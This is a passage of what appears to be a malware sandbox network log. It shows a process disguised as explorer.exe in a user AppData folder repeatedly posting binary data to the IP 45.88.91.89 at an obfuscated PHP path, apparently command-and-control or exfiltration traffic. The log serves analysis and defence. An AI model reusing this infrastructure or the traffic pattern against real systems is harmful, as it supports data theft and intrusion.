                                                      Dec 13, 2024 14:33:06.041651011 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:07.239779949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:07.473078966 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:07 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      23 | 192.168.2.6 | 49847 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:08.027036905 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:09.118302107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:09.357141972 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:08 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      24 | 192.168.2.6 | 49852 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:09.605530024 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:10.742171049 CET | 25 | IN | HTTP/1.1 100 Continue


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      25 | 192.168.2.6 | 49853 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:10.810444117 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:11.897660017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:12.133444071 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:11 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      26 | 192.168.2.6 | 49859 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:10.986248970 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:12.074239969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:12.403295040 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:11 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      27 | 192.168.2.6 | 49862 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:12.664621115 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:13.751754045 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:13.985359907 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:13 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      28 | 192.168.2.6 | 49868 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:14.228312016 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:15.313951015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:15.581617117 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:15 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      29 | 192.168.2.6 | 49874 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:15.829936981 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:16.916068077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:17.153258085 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:16 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      30 | 192.168.2.6 | 49875 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:17.263113022 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:18.351968050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:18.585073948 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      31 | 192.168.2.6 | 49876 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:17.392546892 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:18.476558924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:18.709062099 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      32 | 192.168.2.6 | 49882 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:18.951000929 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:20.045212030 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:20.318013906 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      33 | 192.168.2.6 | 49886 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:20.555969000 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:21.642539978 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:21.881769896 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:21 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      34 | 192.168.2.6 | 49889 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:22.142391920 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:23.227137089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:23.460975885 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:23 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      35 | 192.168.2.6 | 49894 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:23.776990891 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      36 | 192.168.2.6 | 49895 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:24.171540022 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:25.269495964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:25.505440950 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      37 | 192.168.2.6 | 49901 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:25.760771036 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:26.868753910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:27.100920916 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:26 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      38 | 192.168.2.6 | 49906 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:27.353370905 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:28.439193010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:28.677053928 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:28 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      39 | 192.168.2.6 | 49908 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:28.920383930 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      40 | 192.168.2.6 | 49909 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:29.399883986 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1428
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:30.383423090 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:30.621428013 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:30 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      41 | 192.168.2.6 | 49914 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:29.976506948 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2552
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:31.061721087 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:31.376888037 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:30 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      42 | 192.168.2.6 | 49917 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:31.620101929 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
Dec 13, 2024 14:33:31.969547033 CET | 2568 | OUT
Dec 13, 2024 14:33:32.729222059 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:32.965502977 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:32 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 49923 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:33.213720083 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
Dec 13, 2024 14:33:33.563359976 CET | 2568 | OUT
Dec 13, 2024 14:33:34.299746037 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:34.564147949 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:34 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 49928 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:34.808398008 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:35.157095909 CET | 2568 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 49930 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:35.746550083 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:36.094605923 CET | 1456 | OUT
Dec 13, 2024 14:33:36.832726955 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:37.065953970 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:36 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 49931 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:35.868380070 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:36.219671965 CET | 2568 | OUT
Dec 13, 2024 14:33:36.953609943 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:37.189125061 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:36 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 49936 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
